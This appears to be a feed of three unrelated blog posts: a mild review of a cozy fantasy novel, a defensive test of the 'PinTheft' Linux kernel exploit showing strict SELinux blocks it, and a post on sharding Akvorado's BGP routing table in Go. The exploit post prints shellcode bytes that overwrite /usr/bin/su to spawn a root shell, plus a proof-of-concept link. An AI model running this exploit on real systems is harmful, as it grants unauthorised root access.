Review: The Keeper of Magical Things, by Julie Leong

The Keeper of Magical Things is a cozy fantasy novel. It is set in the same universe as The Teller of Small Fortunes, but it doesn't share any characters or plot, they're not marketed as a series, and so far as I can remember neither book would spoil the other. It is Julie Leong's second novel.

Certainty Bulrush is a novice mage with one reliable magical ability: She can talk to objects and occasionally convince them to do small things. This ability is clearly magical, which means Certainty is indeed a mage, but this appears to be all that her magic can do. The Guild has requirements for the level of magical ability required to become a full mage that go beyond talking stained quilts into unstaining themselves, which is why Certainty has been a novice for six years.

This by itself is a problem, since Certainty's cohort keeps passing her by. Worse, though, is that she was counting on the wages of a full mage to pay for her brother's training to become an apothecary. The thought of failing him is extremely upsetting. Certainty therefore jumps at an offered mission to take a cartload of excess magical objects that are causing a dangerous build-up of energies in the Guildtower to safe storage in the small and very unmagical village of Shpelling. Successful completion of that mission will earn Certainty a promotion to Deputy Keeper and therefore to a full mage.

This is the opportunity she didn't know to hope for. The only drawback is that she will have to work with Mage Aurelia, the famously off-putting farspeaker and magical scholar the other novices refer to as the ice witch.

Aurelia is every bit as icy, formal, and condescending as Certainty was afraid she would be, Shpelling grows nothing but garlic, and the inhabitants are suspicious and hostile. The mission could be a disaster if it weren't for Certainty's stubborn good nature.

It's arguably a spoiler to say that there's an enemies to lovers romance, but it's hinted at on the cover, mentioned in the publisher's blurb and, honestly, if you aren't expecting an enemies to lovers romance by a few chapters in, you probably haven't read many books of this sort.

I found The Keeper of Magical Things quietly enjoyable but extremely predictable. If you're in the mood for what it's offering, the predictability may not be a problem, but it was the kind of book where the direction the plot was headed was so obvious that I got a bit bored waiting for it to arrive. Certainty has a good heart, humble origins, limited but specialized magical ability, and a self-esteem problem, and if you've read much fantasy, you've probably read two or three or a dozen other books with variations of this protagonist. You know how they generally turn out, and that is indeed what you're going to get after the obligatory setbacks and tragedies and looming catastrophes.

Aurelia, similarly, is a variation on a character you've probably met before. Certainty discovers, not long into the book, that the brilliant over-achieving mage wears a necklace (supposedly to help her focus) that constantly whispers to her how inadequate she is and how much harder she needs to work. The necklace was given to her by her parents. This book is not exactly subtle.

That said, there's nothing wrong with the characterization. Both Certainty and Aurelia are interesting characters with rounded-out personalities, although it takes a while before Certainty (or the reader) is allowed to see Aurelia's. Their interactions with the inhabitants of Shpelling are fun to watch in the same way that it can be fun to watch people play PowerWash Simulator. You're not in overwhelming suspense about what's going to happen, but the details are amusing and it is satisfying to watch people with good intentions slowly fix things. There is a plot, and a villain, and a not-subtle message about how everyone deserves acknowledgment and respect, and the hours I spent reading about these characters were enjoyable.

The problem with this book isn't that there's anything wrong with it, but that it may not give you more enjoyment than another book you could have been reading. I quite liked The Teller of Small Fortunes in part because it surprised me in a few places and the main character felt a bit different than the typical fantasy protagonist. The Keeper of Magical Things felt less original and a bit more obvious and predictable. It was still quietly good-hearted and occasionally charming, and I think I'll still remember Certainty in a few months, but I'm not feeling the urge to push it into anyone's hands.

If you're in the mood for a gentle fantasy about finding solutions to people's problems and waiting out the prickliness of people who desperately need a friend, you may enjoy this a great deal. Just don't expect unpredictable twists and turns or a surprising plot structure.

An apparent third book in this loose series, The Isle of Lonely Monsters, is currently scheduled for publication in 2027.

Rating: 6 out of 10

26 May 2026 2:50am GMT

We have a new Linux exploit called PinTheft [1]. I did some tests of it with Debian kernel 6.12.74+deb13+1-amd64.

user_t

When I run the exploit as user_t I see the following in the audit log:

type=PROCTITLE msg=audit(1779615031.043:15540): proctitle="./exp"
type=AVC msg=audit(1779615031.043:15541): avc:  denied  { create } for  pid=1360 comm="exp" scontext=user_u:user_r:user_t:s0 tcontext=user_u:user_r:user_t:s0 tclass=rds_socket permissive=0
type=SYSCALL msg=audit(1779615031.043:15541): arch=c000003e syscall=41 success=no exit=-13 a0=15 a1=5 a2=0 a3=0 items=0 ppid=879 pid=1360 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=1 comm="exp" exe="/home/test/b/pocs/pintheft/exp" subj=user_u:user_r:user_t:s0 key=(null)ARCH=x86_64 SYSCALL=socket AUID="test" UID="test" GID="test" EUID="test" SUID="test" FSUID="test" EGID="test" SGID="test" FSGID="test"

The last of the output of running the exploit is the following:

[-] only stole 0/1024 refs - may not be enough
[-] too few stolen refs, aborting
[-] attempt 5 failed, retrying...
[-] all 5 attempts failed

unconfined_t

When I run it as unconfined_t it gave the same output and stracing it had many of the following:

socket(AF_RDS, SOCK_SEQPACKET, 0)       = -1 EAFNOSUPPORT (Address family not supported by protocol)

After I ran "modprobe rds" the exploit worked as unconfined_t with the following output:

[*] verifying page cache overwrite...
[*] page cache page 0 AFTER overwrite (our shellcode) (129 bytes):
  0000:  7f 45 4c 46 02 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|
  0010:  03 00 3e 00 01 00 00 00  68 00 00 00 00 00 00 00  |..>.....h.......|
  0020:  38 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |8...............|
  0030:  00 00 00 00 40 00 38 00  01 00 00 00 05 00 00 00  |....@.8.........|
  0040:  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  0050:  2f 62 69 6e 2f 73 68 00  81 00 00 00 00 00 00 00  |/bin/sh.........|
  0060:  81 00 00 00 00 00 00 00  31 ff b0 69 0f 05 48 8d  |........1..i..H.|
  0070:  3d db ff ff ff 6a 00 57  48 89 e6 31 d2 b0 3b 0f  |=....j.WH..1..;.|
  0080:  05                                                |.|

[+] verification PASSED - page cache overwritten with SHELL_ELF
[+] executing /usr/bin/su (now contains setuid(0) + execve /bin/sh)...

=== RESTORE: sudo cp /tmp/.backup_su_13294 /usr/bin/su && sudo chmod u+s /usr/bin/su ===
# 

Conclusion

SE Linux in a "strict" configuration stops this exploit.

The test VM is running Debian/Testing, I haven't bothered investigating whether it's a default setting for Debian to not load the rds module or whether it was some change that I made either directly or indirectly. Security via SE Linux is of more interest to me than security via controlling module load.

• https://github.com/v12-security/pocs/tree/main/pintheft

24 May 2026 10:32am GMT

To associate routing information-like AS paths or BGP communities-to flows, Akvorado can import routes through the BGP Monitoring Protocol (BMP). As the Internet routing table contains more than 1 million routes, Akvorado needs to scale to tens of millions of routes.¹ This has been a long-standing challenge,² but I expect this issue is now fixed by using RIB sharding, a method that splits the routing database into several parts to enable concurrent updates.

Previous implementation

Akvorado connects 2 elements to build its RIB:

1. a prefix tree, and
2. a list of routes attached to each prefix.

Akvorado BMP RIB implementation without sharding. One single read/write lock.

In the diagram above, the RIB stores five IPv4 prefixes and two IPv6 prefixes. One of them, 2001:db8:1::/48, contains three routes:

• from peer 3, next hop 2001:db8::3:1, AS 65402, AS path 65402, community 65402:31,
• from peer 4, next hop 2001:db8::4:1, same ASN, AS path, and community,
• from peer 5, next hop 2001:db8::5:1, AS 65402, AS path 65401 65402, community 65402:31.

The rib structure is defined in Go as follows:

type rib struct {
    tree          *bart.Table[prefixIndex]
    routes        map[routeKey]route
    nlris         *intern.Pool[nlri]
    nextHops      *intern.Pool[nextHop]
    rtas          *intern.Pool[routeAttributes]
    nextPrefixID  prefixIndex
    freePrefixIDs []prefixIndex
}

The prefix tree uses the bart package, an adaptation of Donald Knuth's ART algorithm. The benchmarks demonstrate it outperforms other packages for lookups, insertions, and memory usage.³ Plus, the author is quite helpful.

Storing routes in a map

The list of routes for each prefix is not stored directly in the prefix tree: it would put too much pressure on the garbage collector by allocating per-prefix arrays.

Instead, the RIB assigns a unique 32-bit prefix identifier for each prefix, either by picking the last available prefix identifier from the freePrefixIDs array if any, or using the nextPrefixID value before incrementing it. Then, the routes are stored in the routes map, leveraging the optimized Swiss table in Go. To retrieve routes attached to a prefix, we look them up one by one in the routes map with a 64-bit key combining the 32-bit prefix index with a 32-bit route index matching the position of the route in the list. Akvorado scans routes from the first to the last to find the best one.⁴ It knows there is no more route if the route key returns no result.

type prefixIndex uint32
type routeIndex uint32
type routeKey uint64

Interning routes

A route contains a BGP peer identifier, a partial NLRI⁵, the next hop, and the attributes.

type route struct {
    peer       uint32
    nlri       intern.Reference[nlri]
    nextHop    intern.Reference[nextHop]
    attributes intern.Reference[routeAttributes]
    prefixLen  uint8
}

type nlri struct {
    family bgp.Family
    path   uint32
    rd     RD
}
type nextHop netip.Addr
type routeAttributes struct {
    asn              uint32
    asPath           []uint32
    communities      []uint32
    largeCommunities []bgp.LargeCommunity
}

To save memory and allocations, NLRI, next hops, and route attributes are "interned:" a 32-bit integer replaces the real value. The mechanism predates the unique package introduced in Go 1.23. We keep it because it has different trade-offs:

• It uses explicit reference counting instead of relying on weak pointers.
• It works with non-comparable values implementing Hash() and Equal() methods.⁶
• It uses explicit pool instances. This will be useful for sharding.
• It has better performance. See for example this benchmark.
• It consumes half the memory thanks to unsigned 32-bit references instead of pointers.
• But it is not safe for concurrent use.

Why does it not scale?

The global read/write lock is a bottleneck in this implementation. But how? There are several users of the RIB, each with its own set of constraints:

• The Kafka workers look up the RIB to enrich flows with routing information. They are bound by the number of Kafka partitions.⁸ Akvorado also adjusts their number to ensure efficient batching to ClickHouse. On our setup, the number of workers oscillates between 8 and 16. As we want to observe the latest data, we cannot afford for the Kafka workers to lag too much.

• The monitored routers send route updates through the BMP protocol. When connecting, they can send millions of routes.⁹ After the initial synchronization, updates are sent continuously and may spike from time to time. The router detects a stuck BMP station when its TCP window is full and resets the session in this case. While Akvorado implements a large incoming buffer, it still needs to update the received routes with the write lock held fast enough to avoid being detected as stuck.

• When a remote BGP peer goes down, Akvorado flushes the associated routes by walking the RIB with the write lock held. When a monitored router goes down, Akvorado waits a bit but eventually flushes all the associated routes.

In short: on a busy setup, lock contention is high for both readers and writers, and neither can lag too much behind.

RIB sharding

First step: basic sharding

To remove the global lock, the RIB is split into several "shards," each one handling a subset of the prefixes:

Akvorado BMP RIB implementation with sharding.

The prefix tree stays global and is protected by a single lock. Each shard gets its read/write lock, its route map, and its intern pools to store NLRIs, next hops, and route attributes, which would not have been possible with Go's unique package. The prefix indexes are also sharded: the 8 most significant bits are the shard index and the 24 remaining bits are the local prefix index.

Gerhard confirmed that after this blind change, the BMP receiver chugged steadily. 🎉

Later, I wrote a concurrent benchmark over half a million synthetic but plausible routes¹⁰ partitioned over 0 to 8 writers, churning routes as fast as possible, while 1 to 16 readers continuously look up a set of 10,000 routes. I don't know if this benchmark is realistic, but it confirms the improvements for both read and write latencies:

Read and write latency performance improvement after sharding.

It also shows that a high number of writers degrades read latency.

Second step: lock-free reads

The single read/write lock protecting the prefix tree is the next target. The bart package provides alternative mutation methods returning an updated tree using copy-on-write. Readers don't need the global lock any more, leaving it only to synchronize writers. The prefix tree is boxed in an atomic pointer.

Akvorado BMP RIB implementation with sharding and lock-free reads.

Without a lock, readers can now fetch a stale prefix index when walking their copy of the tree if a concurrent writer removes the last route attached to this prefix index and recycles it for another prefix. To avoid this issue, we combine the prefix index with a generation number and store them in the tree:

type generation uint32
type prefixRef struct {
    idx prefixIndex
    gen generation
}
type rib struct {
    mu     sync.Mutex
    tree   atomic.Pointer[bart.Table[prefixRef]]
    shards []*ribShard
}

Each shard stores the generation number for each local prefix index. The generation number increases by one if the associated prefix index is freed. When looking up the routes attached to a prefix index, the reader checks if the generation number matches. Otherwise, it assumes the index was recycled and the list of routes is empty.¹¹ You can see this case in the diagram above for prefix index 5, stored with a generation index of 3, while the current value in the []generations array is 4. The generation number could overflow, but it is not a problem as lookups are quick.

Running the concurrent benchmark against this new implementation shows the improvements for the read latency as soon as the cost of the copy-on-write prefix tree is amortized.

Read and write latency performance improvement after lock-free reads. The middle column shows the cumulative improvements of both steps.

Among the multiple attempts to optimize the BMP component, RIB sharding is one of the more satisfying. Akvorado 2.2 implements the first step. PR #2433, drafted while writing this blog post, implements the second step and will be released with Akvorado 2.4. 🪓

24 May 2026 7:50am GMT